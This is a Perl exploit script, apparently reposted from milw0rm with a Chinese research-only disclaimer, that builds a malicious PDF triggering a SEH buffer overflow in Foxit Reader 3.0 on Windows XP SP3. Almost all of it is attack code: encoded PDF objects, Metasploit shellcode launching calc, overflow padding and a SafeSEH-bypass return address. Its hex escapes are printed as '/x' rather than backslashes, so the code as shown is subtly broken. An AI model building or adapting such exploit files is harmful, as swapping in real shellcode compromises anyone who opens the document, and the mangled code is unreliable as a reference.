#!/usr/bin/perl # # Foxit Reader 3.0 (<= Build 1301) PDF Buffer Overflow Exploit # ------------------------------------------------------------ # Exploit by SkD ([email protected]) # # A SEH overflow occurs in this vulnerability in the popular # Foxit Reader. The latest build (1506) is not affected but # previous are. SafeSEH is a bitch in this one, but nothing # is impossible :). # # Exploit written for Windows XP SP3. # # Credits to CORE Sec. # # Note: Author is not responsible for any damage done with this. use strict; use warnings; my $pdf_data1 = "/x25/x50/x44/x46/x2D/x31/x2E/x34/x0D/x0A/x25/xA1/xB3/xC5/xD7/x0D/x0A/x31/x20/x30/x20/x6F/x62/x6A/x0D/x0A/x3C/x3C/x2F/x54/x79/x70". "/x65/x2F/x50/x61/x67/x65/x2F/x50/x61/x72/x65/x6E/x74/x20/x34/x20/x30/x20/x52/x20/x2F/x52/x65/x73/x6F/x75/x72/x63/x65/x73/x20/x36". "/x20/x30/x20/x52/x20/x2F/x4D/x65/x64/x69/x61/x42/x6F/x78/x5B/x20/x30/x20/x30/x20/x35/x39/x35/x20/x38/x34/x32/x5D/x2F/x47/x72/x6F". "/x75/x70/x3C/x3C/x2F/x53/x2F/x54/x72/x61/x6E/x73/x70/x61/x72/x65/x6E/x63/x79/x2F/x43/x53/x2F/x44/x65/x76/x69/x63/x65/x52/x47/x42". "/x2F/x49/x20/x74/x72/x75/x65/x3E/x3E/x2F/x43/x6F/x6E/x74/x65/x6E/x74/x73/x20/x32/x20/x30/x20/x52/x20/x2F/x41/x6E/x6E/x6F/x74/x73". "/x5B/x20/x39/x20/x30/x20/x52/x20/x20/x32/x34/x20/x30/x20/x52/x20/x20/x32/x35/x20/x30/x20/x52/x20/x5D/x3E/x3E/x0D/x0A/x65/x6E/x64". "/x6F/x62/x6A/x0D/x0A/x32/x20/x30/x20/x6F/x62/x6A/x0D/x0A/x3C/x3C/x2F/x4C/x65/x6E/x67/x74/x68/x20/x33/x20/x30/x20/x52/x20/x2F/x46". "/x69/x6C/x74/x65/x72/x2F/x46/x6C/x61/x74/x65/x44/x65/x63/x6F/x64/x65/x3E/x3E/x73/x74/x72/x65/x61/x6D/x0D/x0A/x78/x9C/x33/xD0/x33". "/x54/x28/xE7/x2A/x54/x30/x50/x30/x00/xB2/x4C/x2D/x4D/xF5/x8C/x15/x2C/x4C/x0C/xF5/x2C/x15/x8A/x52/x15/xC2/xB5/x14/xF2/xB8/x02/x15". "/x00/x87/xEB/x07/x8A/x0D/x0A/x65/x6E/x64/x73/x74/x72/x65/x61/x6D/x0D/x0A/x65/x6E/x64/x6F/x62/x6A/x0D/x0A/x33/x20/x30/x20/x6F/x62". "/x6A/x0D/x0A/x20/x34/x32/x0D/x0A/x65/x6E/x64/x6F/x62/x6A/x0D/x0A/x34/x20/x30/x20/x6F/x62/x6A/x0D/x0A/x3C/x3C/x2F/x54/x79/x70/x65". "/x2F/x50/x61/x67/x65/x73/x2F/x52/x65/x73/x6F/x75/x72/x63/x65/x73/x20/x36/x20/x30/x20/x52/x20/x2F/x4D/x65/x64/x69/x61/x42/x6F/x78". "/x5B/x20/x30/x20/x30/x20/x35/x39/x35/x20/x38/x34/x32/x5D/x2F/x4B/x69/x64/x73/x5B/x20/x31/x20/x30/x20/x52/x20/x5D/x2F/x43/x6F/x75". "/x6E/x74/x20/x31/x3E/x3E/x0D/x0A/x65/x6E/x64/x6F/x62/x6A/x0D/x0A/x35/x20/x30/x20/x6F/x62/x6A/x0D/x0A/x3C/x3C/x2F/x5A/x69/x54/x69". "/x20/x31/x38/x20/x30/x20/x52/x20/x3E/x3E/x0D/x0A/x65/x6E/x64/x6F/x62/x6A/x0D/x0A/x36/x20/x30/x20/x6F/x62/x6A/x0D/x0A/x3C/x3C/x2F". "/x46/x6F/x6E/x74/x20/x35/x20/x30/x20/x52/x20/x2F/x50/x72/x6F/x63/x53/x65/x74/x5B/x2F/x50/x44/x46/x2F/x54/x65/x78/x74/x5D/x3E/x3E". "/x0D/x0A/x65/x6E/x64/x6F/x62/x6A/x0D/x0A/x37/x20/x30/x20/x6F/x62/x6A/x0D/x0A/x3C/x3C/x2F/x54/x79/x70/x65/x2F/x43/x61/x74/x61/x6C". "/x6F/x67/x2F/x50/x61/x67/x65/x73/x20/x34/x20/x30/x20/x52/x20/x2F/x4F/x70/x65/x6E/x41/x63/x74/x69/x6F/x6E/x5B/x20/x31/x20/x30/x20". "/x52/x20/x2F/x58/x59/x5A/x20/x6E/x75/x6C/x6C/x20/x6E/x75/x6C/x6C/x20/x30/x5D/x2F/x4C/x61/x6E/x67/x28/x65/x6E/x2D/x55/x53/x29/x3E". "/x3E/x0D/x0A/x65/x6E/x64/x6F/x62/x6A/x0D/x0A/x38/x20/x30/x20/x6F/x62/x6A/x0D/x0A/x3C/x3C/x2F/x41/x75/x74/x68/x6F/x72/x28/xFE/xFF". "/x00/x6D/x00/x61/x00/x72/x00/x63/x00/x69/x00/x61/x00/x6E/x00/x6F/x29/x2F/x43/x72/x65/x61/x74/x6F/x72/x28/xFE/xFF/x00/x57/x00/x72". "/x00/x69/x00/x74/x00/x65/x00/x72/x29/x2F/x50/x72/x6F/x64/x75/x63/x65/x72/x28/xFE/xFF/x00/x4F/x00/x70/x00/x65/x00/x6E/x00/x4F/x00". "/x66/x00/x66/x00/x69/x00/x63/x00/x65/x00/x2E/x00/x6F/x00/x72/x00/x67/x00/x20/x00/x33/x00/x2E/x00/x30/x29/x2F/x43/x72/x65/x61/x74". "/x69/x6F/x6E/x44/x61/x74/x65/x28/x44/x3A/x32/x30/x30/x39/x30/x32/x31/x39/x31/x34/x34/x35/x34/x39/x2D/x30/x32/x27/x30/x30/x27/x29". "/x2F/x4D/x6F/x64/x44/x61/x74/x65/x28/x44/x3A/x32/x30/x30/x39/x30/x32/x31/x39/x31/x34/x34/x38/x31/x35/x2D/x30/x32/x27/x30/x30/x27". "/x29/x3E/x3E/x0D/x0A/x65/x6E/x64/x6F/x62/x6A/x0D/x0A/x31/x35/x20/x30/x20/x6F/x62/x6A/x0D/x0A/x3C/x3C/x2F/x54/x79/x70/x65/x2F/x46". "/x69/x6C/x65/x73/x70/x65/x63/x2F/x46/x28/x63/x75/x61/x6C/x71/x75/x69/x65/x72/x61/x29/x2F/x46/x53/x2F/x55/x52/x4C/x3E/x3E/x0D/x0A". "/x65/x6E/x64/x6F/x62/x6A/x0D/x0A/x31/x34/x20/x30/x20/x6F/x62/x6A/x0D/x0A/x3C/x3C/x2F/x53/x2F/x4D/x43/x44/x2F/x43/x54/x28/x61/x70". "/x70/x6C/x69/x63/x61/x74/x69/x6F/x6E/x2F/x66/x75/x74/x75/x72/x65/x73/x70/x6C/x61/x73/x68/x29/x2F/x50/x3C/x3C/x2F/x54/x46/x28/x54". "/x45/x4D/x50/x41/x43/x43/x45/x53/x53/x29/x3E/x3E/x2F/x44/x20/x31/x35/x20/x30/x20/x52/x20/x3E/x3E/x0D/x0A/x65/x6E/x64/x6F/x62/x6A". "/x0D/x0A/x31/x33/x20/x30/x20/x6F/x62/x6A/x0D/x0A/x3C/x3C/x2F/x53/x2F/x4D/x52/x2F/x43/x20/x31/x34/x20/x30/x20/x52/x20/x2F/x4E/x28". "/x63/x75/x61/x6C/x71/x75/x69/x65/x72/x61/x29/x3E/x3E/x0D/x0A/x65/x6E/x64/x6F/x62/x6A/x0D/x0A/x31/x32/x20/x30/x20/x6F/x62/x6A/x0D". "/x0A/x3C/x3C/x2F/x54/x79/x70/x65/x2F/x41/x63/x74/x69/x6F/x6E/x2F/x53/x2F/x52/x65/x6E/x64/x69/x74/x69/x6F/x6E/x2F/x4F/x50/x20/x34". "/x2F/x41/x4E/x20/x39/x20/x30/x20/x52/x20/x2F/x52/x20/x31/x33/x20/x30/x20/x52/x20/x3E/x3E/x0D/x0A/x65/x6E/x64/x6F/x62/x6A/x0D/x0A". "/x31/x31/x20/x30/x20/x6F/x62/x6A/x0D/x0A/x3C/x3C/x2F/x54/x79/x70/x65/x2F/x45/x78/x74/x47/x53/x74/x61/x74/x65/x2F/x43/x41/x20/x31". "/x2F/x63/x61/x20/x31/x2F/x41/x49/x53/x20/x66/x61/x6C/x73/x65/x3E/x3E/x0D/x0A/x65/x6E/x64/x6F/x62/x6A/x0D/x0A/x31/x30/x20/x30/x20". "/x6F/x62/x6A/x0D/x0A/x3C/x3C/x2F/x4D/x61/x74/x72/x69/x78/x5B/x20/x31/x20/x30/x20/x30/x20/x31/x20/x30/x20/x30/x5D/x2F/x42/x42/x6F". "/x78/x5B/x20/x30/x20/x30/x20/x31/x33/x30/x2E/x31/x33/x39/x20/x32/x37/x2E/x32/x38/x39/x37/x5D/x2F/x52/x65/x73/x6F/x75/x72/x63/x65". "/x73/x3C/x3C/x2F/x45/x78/x74/x47/x53/x74/x61/x74/x65/x3C/x3C/x2F/x49/x6D/x61/x67/x65/x4F/x70/x61/x63/x69/x74/x79/x20/x31/x31/x20". "/x30/x20/x52/x20/x3E/x3E/x3E/x3E/x2F/x4C/x65/x6E/x67/x74/x68/x20/x35/x34/x2F/x46/x69/x6C/x74/x65/x72/x2F/x46/x6C/x61/x74/x65/x44". "/x65/x63/x6F/x64/x65/x3E/x3E/x73/x74/x72/x65/x61/x6D/x0D/x0A/x78/x9C/x2B/xE4/x2A/xE4/x32/x50/x00/xC1/xA2/x74/x30/xC3/xD0/xD8/x40". "/xCF/xD0/xD8/x52/xC1/xC8/x5C/xCF/xC8/xC2/xD2/x5C/xA1/x28/x95/xCB/x50/x01/x08/x8D/x2C/x20/xC2/xA6/x70/xE1/x34/x2D/xAE/x40/x20/x04". "/x00/xBD/x52/x0D/x43/x0D/x0A/x65/x6E/x64/x73/x74/x72/x65/x61/x6D/x0D/x0A/x65/x6E/x64/x6F/x62/x6A/x0D/x0A/x39/x20/x30/x20/x6F/x62". "/x6A/x0D/x0A/x3C/x3C/x2F/x54/x79/x70/x65/x2F/x41/x6E/x6E/x6F/x74/x2F/x53/x75/x62/x74/x79/x70/x65/x2F/x53/x63/x72/x65/x65/x6E/x2F". "/x50/x20/x31/x20/x30/x20/x52/x20/x2F/x4D/x28/x44/x3A/x32/x30/x30/x39/x30/x32/x31/x39/x31/x34/x34/x37/x35/x36/x2D/x30/x32/x27/x30". "/x30/x27/x29/x2F/x46/x20/x34/x2F/x52/x65/x63/x74/x5B/x20/x32/x30/x35/x2E/x31/x35/x33/x20/x38/x30/x36/x2E/x31/x38/x32/x20/x33/x33". "/x35/x2E/x32/x39/x31/x20/x38/x33/x33/x2E/x34/x37/x32/x5D/x2F/x42/x53/x3C/x3C/x2F/x53/x2F/x53/x2F/x57/x20/x31/x3E/x3E/x2F/x42/x45". "/x3C/x3C/x2F/x53/x2F/x53/x3E/x3E/x2F/x4D/x4B/x3C/x3C/x2F/x42/x43/x5B/x20/x30/x20/x30/x20/x31/x5D/x2F/x52/x20/x30/x2F/x49/x46/x3C". "/x3C/x2F/x53/x57/x2F/x41/x2F/x53/x2F/x41/x2F/x46/x42/x20/x66/x61/x6C/x73/x65/x2F/x41/x5B/x20/x30/x2E/x35/x20/x30/x2E/x35/x5D/x3E". "/x3E/x3E/x3E/x2F/x41/x50/x3C/x3C/x2F/x4E/x20/x31/x30/x20/x30/x20/x52/x20/x3E/x3E/x2F/x54/x28/x63/x75/x61/x6C/x71/x75/x69/x65/x72". "/x61/x29/x2F/x41/x20/x31/x32/x20/x30/x20/x52/x20/x2F/x41/x41/x20/x31/x37/x20/x30/x20/x52/x20/x3E/x3E/x0D/x0A/x65/x6E/x64/x6F/x62". "/x6A/x0D/x0A/x32/x35/x20/x30/x20/x6F/x62/x6A/x0D/x0A/x3C/x3C/x2F/x54/x79/x70/x65/x2F/x41/x6E/x6E/x6F/x74/x2F/x53/x75/x62/x74/x79". "/x70/x65/x2F/x50/x6F/x70/x75/x70/x2F/x50/x20/x31/x20/x30/x20/x52/x20/x2F/x4D/x28/x44/x3A/x32/x30/x30/x39/x30/x32/x31/x39/x31/x34". "/x34/x38/x31/x35/x2D/x30/x32/x27/x30/x30/x27/x29/x2F/x46/x20/x32/x38/x2F/x52/x65/x63/x74/x5B/x20/x30/x20/x30/x20/x30/x20/x30/x5D". "/x2F/x4F/x70/x65/x6E/x20/x66/x61/x6C/x73/x65/x2F/x50/x61/x72/x65/x6E/x74/x20/x32/x34/x20/x30/x20/x52/x20/x3E/x3E/x0D/x0A/x65/x6E". "/x64/x6F/x62/x6A/x0D/x0A/x32/x34/x20/x30/x20/x6F/x62/x6A/x0D/x0A/x3C/x3C/x2F/x53/x75/x62/x74/x79/x70/x65/x2F/x46/x72/x65/x65/x54". "/x65/x78/x74/x2F/x52/x65/x63/x74/x5B/x20/x32/x38/x35/x20/x37/x39/x34/x20/x35/x34/x31/x20/x38/x32/x37/x5D/x2F/x46/x20/x34/x2F/x41". "/x50/x20/x31/x39/x20/x30/x20/x52/x20/x2F/x46/x6F/x78/x69/x74/x54/x61/x67/x20/x32/x33/x20/x30/x20/x52/x20/x2F/x50/x20/x31/x20/x30". "/x20/x52/x20/x2F/x50/x6F/x70/x75/x70/x20/x32/x35/x20/x30/x20/x52/x20/x2F/x46/x4E/x28/x48/x65/x6C/x76/x65/x74/x69/x63/x61/x29/x2F". "/x43/x6F/x6E/x74/x65/x6E/x74/x73/x28/x45/x64/x69/x74/x65/x64/x20/x62/x79/x20/x46/x6F/x78/x69/x74/x20/x52/x65/x61/x64/x65/x72/x5C". "/x72/x43/x6F/x70/x79/x72/x69/x67/x68/x74/x5C/x28/x43/x5C/x29/x20/x62/x79/x20/x46/x6F/x78/x69/x74/x20/x53/x6F/x66/x74/x77/x61/x72". "/x65/x20/x43/x6F/x6D/x70/x61/x6E/x79/x2C/x32/x30/x30/x35/x2D/x32/x30/x30/x38/x5C/x72/x46/x6F/x72/x20/x45/x76/x61/x6C/x75/x61/x74". "/x69/x6F/x6E/x20/x4F/x6E/x6C/x79/x2E/x5C/x72/x29/x2F/x42/x4B/x43/x20/x36/x35/x35/x33/x35/x2F/x51/x20/x30/x2F/x44/x41/x28/x2F/x5A". "/x69/x54/x69/x20/x31/x31/x20/x54/x66/x20/x31/x20/x30/x20/x30/x20/x72/x67/x20/x31/x20/x30/x20/x30/x20/x31/x20/x32/x38/x35/x20/x38". "/x31/x30/x2E/x35/x20/x54/x6D/x20/x30/x20/x54/x63/x20/x31/x30/x30/x20/x54/x7A/x29/x2F/x49/x54/x2F/x46/x72/x65/x65/x54/x65/x78/x74". "/x54/x79/x70/x65/x77/x72/x69/x74/x65/x72/x3E/x3E/x0D/x0A/x65/x6E/x64/x6F/x62/x6A/x0D/x0A/x32/x33/x20/x30/x20/x6F/x62/x6A/x0D/x0A". "/x3C/x3C/x2F/x54/x65/x78/x74/x4D/x61/x74/x72/x69/x78/x5B/x20/x31/x20/x30/x20/x30/x20/x31/x20/x32/x38/x35/x20/x38/x31/x30/x2E/x35". "/x5D/x2F/x4C/x69/x63/x65/x6E/x73/x65/x28/x45/x76/x61/x6C/x75/x61/x74/x69/x6F/x6E/x29/x2F/x4D/x65/x6E/x64/x65/x72/x46/x6C/x61/x67". "/x28/x45/x76/x61/x6C/x75/x61/x74/x69/x6F/x6E/x2C/x41/x4E/x4E/x4F/x54/x29/x2F/x46/x6F/x6E/x74/x4E/x61/x6D/x65/x28/x48/x65/x6C/x76". "/x65/x74/x69/x63/x61/x29/x2F/x46/x6F/x6E/x74/x53/x69/x7A/x65/x20/x31/x31/x2F/x54/x65/x78/x74/x28/x45/x64/x69/x74/x65/x64/x20/x62". "/x79/x20/x46/x6F/x78/x69/x74/x20/x52/x65/x61/x64/x65/x72/x5C/x72/x43/x6F/x70/x79/x72/x69/x67/x68/x74/x5C/x28/x43/x5C/x29/x20/x62". "/x79/x20/x46/x6F/x78/x69/x74/x20/x53/x6F/x66/x74/x77/x61/x72/x65/x20/x43/x6F/x6D/x70/x61/x6E/x79/x2C/x32/x30/x30/x35/x2D/x32/x30". "/x30/x38/x5C/x72/x46/x6F/x72/x20/x45/x76/x61/x6C/x75/x61/x74/x69/x6F/x6E/x20/x4F/x6E/x6C/x79/x2E/x5C/x72/x29/x2F/x43/x68/x61/x72". "/x43/x6F/x6C/x6F/x72/x20/x32/x35/x35/x2F/x43/x68/x61/x72/x53/x70/x61/x63/x65/x20/x30/x2F/x4C/x69/x6E/x65/x46/x65/x65/x64/x20/x30". "/x2F/x48/x6F/x72/x7A/x53/x63/x61/x6C/x65/x20/x31/x30/x30/x2F/x4F/x72/x69/x67/x69/x6E/x58/x20/x32/x38/x35/x2F/x4F/x72/x69/x67/x69". "/x6E/x59/x20/x38/x31/x36/x2F/x62/x43/x68/x61/x6E/x67/x65/x42/x6F/x78/x20/x30/x2F/x42/x6F/x78/x57/x69/x64/x74/x68/x20/x32/x35/x36". "/x3E/x3E/x0D/x0A/x65/x6E/x64/x6F/x62/x6A/x0D/x0A/x32/x32/x20/x30/x20/x6F/x62/x6A/x0D/x0A/x3C/x3C/x2F/x4D/x79/x46/x6F/x6E/x74/x20". "/x31/x38/x20/x30/x20/x52/x20/x3E/x3E/x0D/x0A/x65/x6E/x64/x6F/x62/x6A/x0D/x0A/x32/x31/x20/x30/x20/x6F/x62/x6A/x0D/x0A/x3C/x3C/x2F". "/x46/x6F/x6E/x74/x20/x32/x32/x20/x30/x20/x52/x20/x3E/x3E/x0D/x0A/x65/x6E/x64/x6F/x62/x6A/x0D/x0A/x32/x30/x20/x30/x20/x6F/x62/x6A". "/x0D/x0A/x3C/x3C/x2F/x4C/x65/x6E/x67/x74/x68/x20/x31/x36/x38/x2F/x53/x75/x62/x74/x79/x70/x65/x2F/x46/x6F/x72/x6D/x2F/x42/x42/x6F". "/x78/x5B/x20/x32/x38/x35/x20/x37/x39/x34/x20/x35/x34/x31/x20/x38/x32/x37/x5D/x2F/x52/x65/x73/x6F/x75/x72/x63/x65/x73/x20/x32/x31". "/x20/x30/x20/x52/x20/x2F/x46/x69/x6C/x74/x65/x72/x2F/x46/x6C/x61/x74/x65/x44/x65/x63/x6F/x64/x65/x3E/x3E/x73/x74/x72/x65/x61/x6D". "/x0D/x0A/x78/x9C/x95/x8D/xCD/x0E/x82/x30/x10/x84/xEF/x7D/x8A/x3D/x42/xA2/xD8/x16/x88/x78/x15/xE1/x66/x4C/xB4/x2F/x50/x43/xC1/x1A". "/xE8/x92/xA6/xFE/xF4/xED/x25/x24/x28/x89/x27/xF6/x30/x99/x99/x6C/xBE/xD9/x0B/xB2/x39/xFA/x12/x8D/x03/xC6/x40/xD4/x84/x45/x74/x3C". "/xA0/x7F/xC6/x36/x84/xC1/x90/x81/x01/xCF/xD2/xA9/xDD/xEE/x92/xC9/x8A/x8E/x7C/x9F/x79/x12/xC5/x9C/x51/x3A/x40/x0F/x24/x28/x2A/xED". "/x54/x05/x57/x0F/x25/xBE/xB5/x83/xB3/x92/x95/xB2/x21/x88/xFB/x02/x24/x8B/xE7/xC8/x1C/x7B/x6F/x75/x73/x73/x41/x1E/xFE/xC0/x17/xAC". "/xDD/x4B/x5A/x05/x39/x76/xBD/x34/x7E/xC5/x29/x4D/xD7/x83/x64/x0B/xC7/xF8/x7C/xAB/x44/x0B/xC5/x53/xB6/x0F/xE9/x34/x1A/x38/x99/xD6". "/x47/x23/xAF/x10/xE4/x03/x4A/x14/x4C/x32/x0D/x0A/x65/x6E/x64/x73/x74/x72/x65/x61/x6D/x0D/x0A/x65/x6E/x64/x6F/x62/x6A/x0D/x0A/x31". "/x39/x20/x30/x20/x6F/x62/x6A/x0D/x0A/x3C/x3C/x2F/x4E/x20/x32/x30/x20/x30/x20/x52/x20/x3E/x3E/x0D/x0A/x65/x6E/x64/x6F/x62/x6A/x0D". "/x0A/x31/x38/x20/x30/x20/x6F/x62/x6A/x0D/x0A/x3C/x3C/x2F/x54/x79/x70/x65/x2F/x46/x6F/x6E/x74/x2F/x53/x75/x62/x74/x79/x70/x65/x2F". "/x54/x79/x70/x65/x31/x2F/x42/x61/x73/x65/x46/x6F/x6E/x74/x2F/x48/x65/x6C/x76/x65/x74/x69/x63/x61/x2F/x45/x6E/x63/x6F/x64/x69/x6E". "/x67/x2F/x57/x69/x6E/x41/x6E/x73/x69/x45/x6E/x63/x6F/x64/x69/x6E/x67/x2F/x46/x78/x54/x61/x67/x20/x31/x3E/x3E/x0D/x0A/x65/x6E/x64". "/x6F/x62/x6A/x0D/x0A/x31/x37/x20/x30/x20/x6F/x62/x6A/x0D/x0A/x3C/x3C/x2F/x50/x56/x20/x31/x36/x20/x30/x20/x52/x20/x3E/x3E/x0D/x0A". "/x65/x6E/x64/x6F/x62/x6A/x0D/x0A/x31/x36/x20/x30/x20/x6F/x62/x6A/x0D/x0A/x3C/x3C/x2F/x54/x79/x70/x65/x2F/x41/x63/x74/x69/x6F/x6E". "/x2F/x53/x2F/x4C/x61/x75/x6E/x63/x68/x2F/x46/x3C/x3C/x2F/x46/x28/x2F/x43/x2F"; my $pdf_data2 = "/x29/x3E/x3E/x2F/x4E/x65/x77/x57/x69/x6E/x64/x6F/x77/x20/x74/x72/x75/x65/x3E/x3E/x0D/x0A/x65/x6E/x64/x6F/x62/x6A/x0D/x0A/x78/x72". "/x65/x66/x0D/x0A/x30/x20/x32/x36/x0D/x0A/x30/x30/x30/x30/x30/x30/x30/x30/x30/x30/x20/x36/x35/x35/x33/x36/x20/x66/x0D/x0A/x30/x30". "/x30/x30/x30/x30/x30/x30/x31/x37/x20/x30/x30/x30/x30/x30/x20/x6E/x0D/x0A/x30/x30/x30/x30/x30/x30/x30/x31/x39/x37/x20/x30/x30/x30". "/x30/x30/x20/x6E/x0D/x0A/x30/x30/x30/x30/x30/x30/x30/x33/x31/x34/x20/x30/x30/x30/x30/x30/x20/x6E/x0D/x0A/x30/x30/x30/x30/x30/x30". "/x30/x33/x33/x36/x20/x30/x30/x30/x30/x30/x20/x6E/x0D/x0A/x30/x30/x30/x30/x30/x30/x30/x34/x33/x32/x20/x30/x30/x30/x30/x30/x20/x6E". "/x0D/x0A/x30/x30/x30/x30/x30/x30/x30/x34/x36/x38/x20/x30/x30/x30/x30/x30/x20/x6E/x0D/x0A/x30/x30/x30/x30/x30/x30/x30/x35/x32/x32". "/x20/x30/x30/x30/x30/x30/x20/x6E/x0D/x0A/x30/x30/x30/x30/x30/x30/x30/x36/x31/x39/x20/x30/x30/x30/x30/x30/x20/x6E/x0D/x0A/x30/x30". "/x30/x30/x30/x30/x31/x33/x37/x30/x20/x30/x30/x30/x30/x30/x20/x6E/x0D/x0A/x30/x30/x30/x30/x30/x30/x31/x31/x34/x37/x20/x30/x30/x30". "/x30/x30/x20/x6E/x0D/x0A/x30/x30/x30/x30/x30/x30/x31/x30/x38/x38/x20/x30/x30/x30/x30/x30/x20/x6E/x0D/x0A/x30/x30/x30/x30/x30/x30". "/x31/x30/x31/x35/x20/x30/x30/x30/x30/x30/x20/x6E/x0D/x0A/x30/x30/x30/x30/x30/x30/x30/x39/x36/x32/x20/x30/x30/x30/x30/x30/x20/x6E". "/x0D/x0A/x30/x30/x30/x30/x30/x30/x30/x38/x37/x32/x20/x30/x30/x30/x30/x30/x20/x6E/x0D/x0A/x30/x30/x30/x30/x30/x30/x30/x38/x31/x33". "/x20/x30/x30/x30/x30/x30/x20/x6E/x0D/x0A/x30/x30/x30/x30/x30/x30/x32/x39/x38/x34/x20/x30/x30/x30/x30/x30/x20/x6E/x0D/x0A/x30/x30". "/x30/x30/x30/x30/x32/x39/x34/x39/x20/x30/x30/x30/x30/x30/x20/x6E/x0D/x0A/x30/x30/x30/x30/x30/x30/x32/x38/x34/x39/x20/x30/x30/x30". "/x30/x30/x20/x6E/x0D/x0A/x30/x30/x30/x30/x30/x30/x32/x38/x31/x35/x20/x30/x30/x30/x30/x30/x20/x6E/x0D/x0A/x30/x30/x30/x30/x30/x30". "/x32/x35/x32/x30/x20/x30/x30/x30/x30/x30/x20/x6E/x0D/x0A/x30/x30/x30/x30/x30/x30/x32/x34/x38/x33/x20/x30/x30/x30/x30/x30/x20/x6E". "/x0D/x0A/x30/x30/x30/x30/x30/x30/x32/x34/x34/x34/x20/x30/x30/x30/x30/x30/x20/x6E/x0D/x0A/x30/x30/x30/x30/x30/x30/x32/x31/x30/x32". "/x20/x30/x30/x30/x30/x30/x20/x6E/x0D/x0A/x30/x30/x30/x30/x30/x30/x31/x37/x36/x36/x20/x30/x30/x30/x30/x30/x20/x6E/x0D/x0A/x30/x30". "/x30/x30/x30/x30/x31/x36/x33/x35/x20/x30/x30/x30/x30/x30/x20/x6E/x0D/x0A/x74/x72/x61/x69/x6C/x65/x72/x0D/x0A/x3C/x3C/x2F/x52/x6F". "/x6F/x74/x20/x37/x20/x30/x20/x52/x20/x2F/x49/x6E/x66/x6F/x20/x38/x20/x30/x20/x52/x20/x2F/x49/x44/x5B/x28/xDF/xB0/x2B/xEC/xF3/x6B". "/xFA/x01/x9C/xBC/x4B/x06/x11/x7C/x78/x79/x29/x28/xDF/xB0/x2B/xEC/xF3/x6B/xFA/x01/x9C/xBC/x4B/x06/x11/x7C/x78/x79/x29/x5D/x2F/x44". "/x6F/x63/x43/x68/x65/x63/x6B/x73/x75/x6D/x2F/x37/x36/x33/x36/x30/x32/x39/x46/x42/x32/x42/x32/x46/x44/x32/x39/x42/x43/x33/x34/x41". "/x42/x43/x33/x32/x43/x46/x34/x35/x42/x38/x46/x2F/x53/x69/x7A/x65/x20/x32/x36/x3E/x3E/x0D/x0A/x73/x74/x61/x72/x74/x78/x72/x65/x66". "/x0D/x0A/x38/x30/x35/x37/x0D/x0A/x25/x25/x45/x4F/x46/x0D/x0A"; # win32_exec - EXITFUNC=process CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com my $shellcode = "/xeb/x03/x59/xeb/x05/xe8/xf8/xff/xff/xff/x4f/x49/x49/x49/x49/x49". "/x49/x51/x5a/x56/x54/x58/x36/x33/x30/x56/x58/x34/x41/x30/x42/x36". "/x48/x48/x30/x42/x33/x30/x42/x43/x56/x58/x32/x42/x44/x42/x48/x34". "/x41/x32/x41/x44/x30/x41/x44/x54/x42/x44/x51/x42/x30/x41/x44/x41". "/x56/x58/x34/x5a/x38/x42/x44/x4a/x4f/x4d/x4e/x4f/x4a/x4e/x46/x34". "/x42/x50/x42/x30/x42/x50/x4b/x58/x45/x44/x4e/x43/x4b/x58/x4e/x37". "/x45/x30/x4a/x37/x41/x30/x4f/x4e/x4b/x38/x4f/x44/x4a/x41/x4b/x58". "/x4f/x55/x42/x32/x41/x30/x4b/x4e/x49/x44/x4b/x38/x46/x53/x4b/x58". "/x41/x30/x50/x4e/x41/x43/x42/x4c/x49/x39/x4e/x4a/x46/x48/x42/x4c". "/x46/x37/x47/x50/x41/x4c/x4c/x4c/x4d/x30/x41/x50/x44/x4c/x4b/x4e". "/x46/x4f/x4b/x53/x46/x55/x46/x32/x46/x50/x45/x37/x45/x4e/x4b/x48". "/x4f/x35/x46/x32/x41/x30/x4b/x4e/x48/x36/x4b/x58/x4e/x30/x4b/x54". "/x4b/x48/x4f/x55/x4e/x41/x41/x50/x4b/x4e/x4b/x48/x4e/x31/x4b/x38". "/x41/x30/x4b/x4e/x49/x58/x4e/x45/x46/x32/x46/x50/x43/x4c/x41/x33". "/x42/x4c/x46/x46/x4b/x58/x42/x44/x42/x33/x45/x38/x42/x4c/x4a/x47". "/x4e/x30/x4b/x48/x42/x34/x4e/x50/x4b/x48/x42/x37/x4e/x51/x4d/x4a". "/x4b/x48/x4a/x36/x4a/x30/x4b/x4e/x49/x50/x4b/x58/x42/x48/x42/x4b". "/x42/x30/x42/x30/x42/x30/x4b/x38/x4a/x56/x4e/x43/x4f/x35/x41/x43". "/x48/x4f/x42/x36/x48/x45/x49/x58/x4a/x4f/x43/x48/x42/x4c/x4b/x37". "/x42/x55/x4a/x36/x50/x37/x4a/x4d/x44/x4e/x43/x47/x4a/x36/x4a/x59". "/x50/x4f/x4c/x38/x50/x30/x47/x35/x4f/x4f/x47/x4e/x43/x46/x41/x36". "/x4e/x56/x43/x36/x42/x50/x5a"; my $overflow1 = "/x41" x 1346; my $overflow2 = "/x41" x (4096 - (length($shellcode) + 255)); my $overflow3 = "/x41" x 255; my $sehjmp = "SkD"; # ;) my $sehret = "/x64/xee/x1f/x02"; # 0x021fee64 - damn you SafeSEH open (my $pdf, "> s.pdf"); binmode $pdf; print $pdf $pdf_data1. $overflow1.$sehjmp.$sehret.$overflow2.$shellcode.$overflow3. $pdf_data2; close $pdf;
# milw0rm.com [2009-03-11]
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论